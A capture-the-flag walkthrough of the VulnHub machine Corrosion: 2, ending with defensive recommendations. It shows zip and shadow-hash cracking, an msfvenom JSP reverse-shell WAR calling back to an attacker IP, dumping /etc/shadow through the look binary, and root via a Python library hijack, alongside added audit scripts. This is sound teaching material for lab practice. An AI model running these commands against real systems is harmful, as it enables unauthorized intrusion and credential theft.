Overview
Proxy Programmer’s Corrosion: 2 is a medium-difficulty machine available on VulnHub. It is designed to challenge experienced CTF players with a variety of tasks that test their abilities in network scanning, enumeration, exploitation, and privilege escalation. This walkthrough provides a step-by-step guide to compromising the machine, along with the methodology, recommendations, and a concluding analysis.
Methodology
1. Network Scanning:
- Identify the target machine’s IP address.
- Scan for open ports and services using Nmap.
2. Enumeration:
- Explore available web services on identified ports.
- Perform directory brute-forcing to discover hidden files or directories.
- Analyze the discovered files for useful information.
3. Exploitation:
- Use discovered credentials to access restricted areas.
- Upload a reverse shell payload to gain initial access.
- Escalate privileges by leveraging discovered vulnerabilities or misconfigurations.
4. Post-Exploitation:
- Obtain user and root flags.
Walkthrough
1. Network Scanning
We begin by identifying the target machine’s IP address using netdiscover:
netdiscover
Target IP: 192.168.1.11
Next, we use nmap to scan the identified IP for open ports and running services:
nmap -sV 192.168.1.11
Nmap Results:
- Port 22: SSH
- Port 80: HTTP (Apache Server)
- Port 8080: HTTP (Tomcat Server)
2. Enumeration
First, we check the Apache server on port 80, which only displays the default Apache landing page. The Tomcat server on port 8080 likewise shows the stock Tomcat welcome page, with nothing unusual on it.
Next, we perform directory brute-forcing on the Tomcat server using dirb:
dirb http://192.168.1.11:8080/ -X .php,.zip
- Findings: A backup file (backup.zip) is discovered in one of the directories.
We download the zip file with wget and try to extract it:
unzip backup.zip
Unzip prompts for a password, so the archive is password-protected. We crack it with fcrackzip in dictionary mode (-D) using the rockyou.txt wordlist as the dictionary (-p); -u makes fcrackzip verify each candidate by actually unzipping, which weeds out false positives:
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
- Cracked password: @administrator_hi5
We unzip the file and examine its contents:
unzip backup.zip
The archive contains Tomcat's tomcat-users.xml, which we inspect:
cat tomcat-users.xml
- Findings: tomcat-users.xml holds the Tomcat Manager credentials admin:melehifokivai in clear text.
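An added example, not part of the walkthrough: a small audit script that reads a tomcat-users.xml and reports which accounts hold deployment-capable roles and which still carry plain-text passwords, the combination that makes a leaked copy of this file so valuable. The XML embedded below is constructed to mirror the file's layout; the placeholder passwords and the deployer and monitor accounts are assumptions, not values from the box.

```python
import re
import xml.etree.ElementTree as ET

# Roles that allow deploying or managing web applications through the
# Manager and Host Manager apps. Holding one is equivalent to code
# execution on the Tomcat host, which is exactly what the WAR upload
# later in this walkthrough exercises.
DANGEROUS_ROLES = {
    "manager-gui", "manager-script", "manager-jmx",
    "admin-gui", "admin-script",
}

# Credentials digested by Tomcat's MessageDigestCredentialHandler look
# like <salt>$<iterations>$<hex digest>; anything else is stored as typed.
_DIGEST_RE = re.compile(r"^[0-9a-f]+\$\d+\$[0-9a-f]+$", re.IGNORECASE)

# Constructed sample in the layout of a real tomcat-users.xml. The
# passwords are placeholders, not the values recovered from backup.zip.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="admin" password="placeholder-plaintext" roles="manager-gui,admin-gui"/>
  <user username="deployer" password="6d8f1a$100000$3f9a2c7be1d04e5f" roles="manager-script"/>
  <user username="monitor" password="monitor" roles="manager-status"/>
</tomcat-users>
"""


def _local_name(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree adds when a default xmlns is set."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> list:
    """Return one finding per <user>: which dangerous roles it holds and
    whether its password is stored in plain text."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local_name(elem.tag) != "user":
            continue
        # Tomcat accepts both attribute spellings.
        name = elem.get("username") or elem.get("name") or "?"
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        findings.append({
            "username": name,
            "dangerous_roles": sorted(roles & DANGEROUS_ROLES),
            "plaintext_password": bool(password) and not _DIGEST_RE.match(password),
        })
    return findings


def risky_accounts(xml_text: str) -> list:
    """Usernames that can deploy code AND whose password is readable as-is:
    the combination that turned backup.zip into a shell on this box."""
    return [f["username"] for f in audit_tomcat_users(xml_text)
            if f["dangerous_roles"] and f["plaintext_password"]]


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
    print("deploy-capable accounts with plain-text passwords:",
          risky_accounts(SAMPLE_TOMCAT_USERS))
```

Run it against a copy of the real file to get the same verdict the attacker reaches by eye; the plaintext heuristic is only the shape of Tomcat's own digest format, so a site that configured a different CredentialHandler would need the regex adjusted.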
3. Exploitation
Using the discovered credentials, we log into the Tomcat Manager application. The Manager's "WAR file to deploy" form accepts an arbitrary web application, so we package a reverse shell as a WAR with msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.9 LPORT=5555 -f war -o revshell.war
Payload details:
- LHOST: the attacker's IP address (192.168.1.9 here)
- LPORT: the port the attacker listens on (5555 here)
- Output format: WAR (Web Application Archive), the format the Manager deploys
We upload revshell.war through the deploy form at the bottom of the Manager page. After a successful upload, /revshell appears in the application list.
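What msfvenom hands back is just a zip with a fixed layout. The following is an added example, not the walkthrough's or msfvenom's own code: it builds a WAR the same way (WEB-INF/web.xml plus one JSP named as the welcome file), which is why clicking the bare /revshell/ link on the Manager page is enough to run the JSP. The JSP it packages is an assumed benign canary that reports the account Tomcat runs as, useful to confirm a deployment before uploading anything heavier; the file names are assumptions.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

# Deployment descriptor that names the JSP as the welcome file, so a
# request for the bare context path (/revshell/ on the Manager page)
# runs it without the caller needing to know the JSP's file name.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list>
    <welcome-file>{jsp}</welcome-file>
  </welcome-file-list>
</web-app>
"""

# Assumed benign canary JSP: reports the OS account and working directory
# of the Tomcat process, which is the context a reverse shell would inherit.
CANARY_JSP = """<%@ page contentType="text/plain" %>
user=<%= System.getProperty("user.name") %>
cwd=<%= System.getProperty("user.dir") %>
"""


def build_war(jsp_name: str, jsp_source: str) -> bytes:
    """Package WEB-INF/web.xml plus one JSP into an in-memory WAR (a zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(jsp=jsp_name))
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes: bytes) -> list:
    """List the archive members; useful on the defender's side too, since a
    WAR holding only web.xml and a single JSP is worth a second look."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def welcome_file(war_bytes: bytes) -> str:
    """Read back which file Tomcat will serve for the bare context path."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        root = ET.fromstring(war.read("WEB-INF/web.xml"))
    for elem in root.iter():
        if elem.tag.rsplit("}", 1)[-1] == "welcome-file" and elem.text:
            return elem.text.strip()
    return ""


if __name__ == "__main__":
    data = build_war("index.jsp", CANARY_JSP)
    with open("canary.war", "wb") as fh:
        fh.write(data)
    print(war_entries(data), "welcome file:", welcome_file(data))
```

Deploy canary.war through the same form, open /canary/, and the response tells you which account a subsequent reverse shell would land as. The two-entry layout is also what to look for when triaging a suspicious WAR pulled from a Tomcat webapps directory.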
Before triggering the payload, start a netcat listener on the attacker's machine on the port given as LPORT:
nc -lnvp 5555
Then click the /revshell/ link in the application list. Tomcat serves the JSP, which connects back to the listener.
After triggering the payload, we obtain a shell. To upgrade it to a proper TTY, we use Python:
python3 -c 'import pty;pty.spawn("/bin/bash")'
With a usable shell, we explore the system for sensitive files and privilege escalation paths. The home directories hold the user.txt flag, along with a note that provides clues for the next step:
cd /home
ls
cd jaye
ls
cd ../randy
ls
cat user.txt
cat note.txt
- User flag: found in user.txt.
- Note: provides hints related to privilege escalation.
Next, we try the Tomcat password melehifokivai against the other user, jaye. It works over SSH, so the same password was reused for an OS account:
ssh jaye@192.168.1.11
SSH already gives jaye a fully interactive TTY, so the pty trick is not required here, although it does no harm:
python3 -c 'import pty;pty.spawn("/bin/bash")'
The note found earlier hints that jaye can run the look command. look prints the lines of a file that begin with a given string; with an empty string every line matches, so it prints the whole file, and because jaye is allowed to run it with elevated rights it will read files such as /etc/shadow and /etc/passwd that jaye otherwise cannot.
Following the look entry on GTFOBins (a catalogue of Unix binaries whose legitimate functions can be abused to read files, escalate privileges or break out of restricted shells), we dump /etc/shadow and take the password hash of the user randy.
We save the hash to a file named hash.txt and crack it with john, using the rockyou.txt wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
- Cracked password: 07051986randy
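Added example, not from the walkthrough: once /etc/shadow has been dumped, the line for the target user has to be isolated and its hash type recognised so that john is fed a usable entry. The script below does that over constructed shadow lines (the hash bodies are placeholders, not genuine digests, and the daemon and svc accounts are assumptions), skipping locked accounts that cannot be cracked and mapping the crypt(3) prefix to the format name john uses.

```python
# Constructed /etc/shadow excerpt: the field layout is real, the hash
# bodies are placeholders rather than genuine digests.
SAMPLE_SHADOW = """root:$6$placeholderA$rootrootrootrootrootrootroot:19000:0:99999:7:::
daemon:*:18000:0:99999:7:::
jaye:$6$placeholderB$jayejayejayejayejayejaye:19000:0:99999:7:::
randy:$6$placeholderC$randyrandyrandyrandyrandy:19000:0:99999:7:::
svc:$y$j9T$placeholderD$svcsvcsvcsvcsvcsvcsvc:19000:0:99999:7:::
"""

# crypt(3) prefix -> (algorithm name, john --format value). john detects
# the first three on its own; yescrypt goes through its generic crypt(3)
# backend, which only works if the host libcrypt supports yescrypt.
CRYPT_PREFIXES = [
    ("$1$", "md5crypt", "md5crypt"),
    ("$5$", "sha256crypt", "sha256crypt"),
    ("$6$", "sha512crypt", "sha512crypt"),
    ("$y$", "yescrypt", "crypt"),
]

# Password fields that mean "no password can ever match".
LOCKED_MARKERS = ("", "*", "!", "!!")


def shadow_fields(shadow_text: str, user: str):
    """Return the nine colon-separated fields of `user`'s entry, or None."""
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) == 9 and fields[0] == user:
            return fields
    return None


def crackable_hash(shadow_text: str, user: str):
    """Pick out the hash for `user` as a john-ready 'user:hash' line, flagging
    accounts that are locked (a leading '!' freezes an otherwise valid hash)."""
    fields = shadow_fields(shadow_text, user)
    if fields is None:
        return None
    h = fields[1]
    if h in LOCKED_MARKERS or h.startswith("!"):
        return {"user": user, "locked": True, "algorithm": None,
                "john_format": None, "line": None}
    for prefix, algorithm, fmt in CRYPT_PREFIXES:
        if h.startswith(prefix):
            return {"user": user, "locked": False, "algorithm": algorithm,
                    "john_format": fmt, "line": f"{user}:{h}"}
    return {"user": user, "locked": False, "algorithm": "unknown",
            "john_format": None, "line": f"{user}:{h}"}


def write_hash_file(shadow_text: str, user: str, path: str = "hash.txt") -> bool:
    """Write the john input file for `user`; False if there is nothing to crack."""
    entry = crackable_hash(shadow_text, user)
    if entry is None or entry["locked"]:
        return False
    with open(path, "w") as fh:
        fh.write(entry["line"] + "\n")
    return True


if __name__ == "__main__":
    for name in ("randy", "daemon", "svc", "nobody"):
        print(name, crackable_hash(SAMPLE_SHADOW, name))
```

For randy's sha512crypt entry the plain john command above needs no --format flag; the mapping matters on newer Ubuntu releases, where new accounts get yescrypt hashes and john has to be told to use its crypt backend.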
4. Privilege Escalation
With Randy's password in hand, we log in via SSH and check what sudo allows:
ssh randy@192.168.1.11
sudo -l
cat /home/randy/randombase64.py
The output shows that randy may run /usr/bin/python3.8 on /home/randy/randombase64.py as root. The script imports the base64 module, which makes it a candidate for Python library hijacking: if we can change the base64.py that the interpreter loads, our code runs with root privileges the moment the script imports it.

To find where the base64 module lives on disk, we use locate, then check the file's permissions with ls -la. The file turns out to be writable by randy, which is what makes the hijack possible:
locate base64.py
ls -la /usr/lib/python3.8/base64.py
We edit the file with nano and add two lines at module level (the top of the file is simplest); they execute as soon as base64 is imported, before the script does anything else:
nano /usr/lib/python3.8/base64.py
import os
os.system("/bin/bash")
Bear in mind that every program on the host that imports base64 will now drop into a shell, so restore the original file once root is obtained.
Finally, we run the randombase64.py script using sudo, which triggers the modified base64.py and spawns a root shell:
sudo /usr/bin/python3.8 /home/randy/randombase64.py
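Added example, not from the walkthrough: a check for the condition this escalation relies on. When sudo runs an interpreter on a script, Python puts the script's own directory first on sys.path and then searches the remaining entries in order, so a base64.py that randy can write anywhere before, or at, the genuine stdlib module runs as root. The function below walks a search path in import order and reports both kinds of spot: a writable directory searched earlier than the real module (drop a shadowing base64.py there, which on this box would be /home/randy itself) and a writable module file (the case the walkthrough exploits). The temporary layout built by demo() is constructed for illustration; its directory names are assumptions.

```python
import os
import sys
import tempfile
from pathlib import Path
from typing import Callable, List, Optional, Tuple

Finding = Tuple[str, str]


def _candidates(base: Path, name: str):
    """The two file layouts a pure-Python top-level module can have."""
    return (base / f"{name}.py", base / name / "__init__.py")


def resolve_module(name: str, search_path: List[str]) -> Optional[Path]:
    """The file the import system would load for `name`, following path order."""
    for entry in search_path:
        for cand in _candidates(Path(entry or "."), name):
            if cand.is_file():
                return cand
    return None


def hijack_points(name: str, search_path: List[str],
                  writable: Callable[[Path], bool] = lambda p: os.access(p, os.W_OK)
                  ) -> List[Finding]:
    """Walk `search_path` in import order and report where the calling user
    could make `name` resolve to their own code:
      ("shadow", path)     a writable directory searched before the real module
      ("overwrite", path)  the real module file itself is writable
    The walk stops at the real module: later entries are never consulted."""
    findings: List[Finding] = []
    for entry in search_path:
        base = Path(entry or ".")
        for cand in _candidates(base, name):
            if cand.is_file():
                if writable(cand):
                    findings.append(("overwrite", str(cand)))
                return findings
        if base.is_dir() and writable(base):
            findings.append(("shadow", str(base / f"{name}.py")))
    return findings


def demo() -> List[Finding]:
    """Rebuild the box's situation in a temp dir: the script's own directory
    (sys.path[0] when sudo runs python3.8 on a script under /home/randy)
    followed by a stand-in stdlib directory whose base64.py is writable."""
    root = Path(tempfile.mkdtemp(prefix="hijack-demo-"))
    home = root / "home" / "randy"
    lib = root / "usr" / "lib" / "python3.8"
    home.mkdir(parents=True)
    lib.mkdir(parents=True)
    (lib / "base64.py").write_text("# stand-in for the stdlib module\n")
    return hijack_points("base64", [str(home), str(lib)])


if __name__ == "__main__":
    print("demo layout:", demo())
    # To audit the interpreter a sudo rule names, run this file with that
    # interpreter (e.g. /usr/bin/python3.8) so sys.path is the one it uses.
    print("this interpreter:", hijack_points("base64", sys.path))
```

Two points the output makes concrete: the world-writable stdlib file is not the only way in, because the script's home directory comes first on the path and randy owns it; and the fix is therefore not just chmod on base64.py but moving sudo-invoked scripts out of user-owned directories.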
With root access, we move to root's home directory and read the root.txt flag:
cd /root
ls
cat root.txt
With that, the machine is complete.
Recommendations
1. Enforce Strong Password Policies:
Use complex, unique passwords across all accounts and add multi-factor authentication to reduce the risk of credential-based attacks. On this box the Tomcat Manager password also opened the jaye OS account, and randy's password was in rockyou.txt.
2. Secure Backup Files:
Store backups outside the web root, encrypt them with a proper key rather than a short zip password, and never leave them where a directory brute-force can find them. Here a guessable zip password handed over tomcat-users.xml, and with it the Manager credentials.
3. Restrict Access to Management Interfaces:
Limit the Tomcat Manager to trusted source addresses (Tomcat's RemoteAddrValve), place it behind a VPN or firewall, and keep the manager-gui and manager-script roles on separate accounts so that no single credential can both browse the UI and script deployments.
4. Regular Security Audits:
Perform routine assessments to identify and mitigate vulnerabilities, especially those related to privilege escalation, and keep sudo privileges to the minimum necessary. A sudo rule that runs an interpreter on a script is only as safe as every file that script imports and the script's own directory: library files must not be writable by the user holding the rule, and the script should not live in that user's home.
5. Implement Proper Logging and Monitoring:
Enable comprehensive logging and monitoring across the system to detect suspicious activity such as WAR deployments through the Manager, reads of /etc/shadow, edits to interpreter library files, and sudo invocations that end in an interactive shell.
Conclusion
The Corrosion: 2 machine offers a comprehensive challenge that covers the full spectrum of penetration testing techniques, from initial network enumeration to advanced privilege escalation. The exercise highlights the importance of securing sensitive files, enforcing strict password policies, and regularly auditing system configurations to prevent potential exploitation. By following the recommendations provided, organizations can significantly reduce the risk of similar vulnerabilities being exploited in real-world environments.